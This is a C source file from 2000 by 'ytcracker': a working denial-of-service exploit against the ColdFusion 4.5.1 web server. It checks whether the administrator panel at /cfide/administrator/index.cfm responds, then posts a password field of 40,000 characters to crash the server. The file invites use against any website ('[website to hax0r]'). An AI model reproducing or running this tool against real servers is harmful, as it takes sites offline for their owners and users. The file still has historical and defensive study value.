/* [yl-cfDoS.c]

title:		[cold fusion 4.5.1 ereeu DoS attack]
date:		06.11.2000
author:		ytcracker[phed@felons.org]
comments:	allaire[www.allaire.com]'s cold fusion webserver seemingly
		has an odd little bug in it where it suffers from a denial
		of service attack when the administrator panel is accessed
		using a character post of greater than 4o,ooo characters.

		if your password is 4o,ooo or more characters, i suggest
		that you change your password immediately.

		usage: ./yl-cfDoS [website to hax0r]
shouts:	seven one nine.  master p and the no limit army.  geese.
credit:	foundstone for the buqtraq advisory.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>

int main(int argc, char **argv)
{
	int sock;
	unsigned long vulnip;

	struct in_addr addr;
	struct sockaddr_in sin;
	struct hostent *he;
	
	char *detect;
	char buffer[1024];
	char cfhack[]="POST /cfide/administrator/index.cfm HTTP/1.0\n\nReferer: http://www.csanetworks.com\nUser-Agent: ytCracker vo.1 (ytCLinux 5.o)\n";
	char cfchars[40001];
	char cfdos[40050];
	
	printf("\n [cf 4.5.1 DoS] [ytcracker] [phed@felons.org]\n");

	if(argc<2)
	{
		printf(" usage: %s [vulnerable website]\n\n",argv[0]);
		exit(0);
	}

	if ((he=gethostbyname(argv[1])) == NULL)
	{
		herror("gethostbyname");
		exit(0);
	}

	vulnip=inet_addr(argv[1]);
      vulnip=ntohl(vulnip);

	sock=socket(AF_INET, SOCK_STREAM, 0);
	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
	sin.sin_family=AF_INET;
	sin.sin_port=htons(80);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
	{  
		perror("connect");
	}

	send(sock, cfhack,strlen(cfhack),0);
	recv(sock, buffer, sizeof(buffer),0);
	detect = strstr(buffer,"404");
	close(sock);
     
	if( detect != NULL)
        {
		printf(" vulnerabilty not detected.\n\n");
		exit(0);
        }
	else
		printf(" vulnerability detected.\n");

		printf(" sending crash data.\n");

	memset(cfchars,89,sizeof(cfchars));
	sprintf(cfdos,"%s\nPasswordProvided=%s\n\n\n",cfhack,cfchars);

	vulnip=inet_addr(argv[1]);
      vulnip=ntohl(vulnip);

	sock=socket(AF_INET, SOCK_STREAM, 0);
	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
	sin.sin_family=AF_INET;
	sin.sin_port=htons(80);

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
	{  
		perror("connect");
	}

	send(sock,cfdos,strlen(cfdos),0);
	close(sock);

	printf(" data sent!\n\n");
	return 0;
}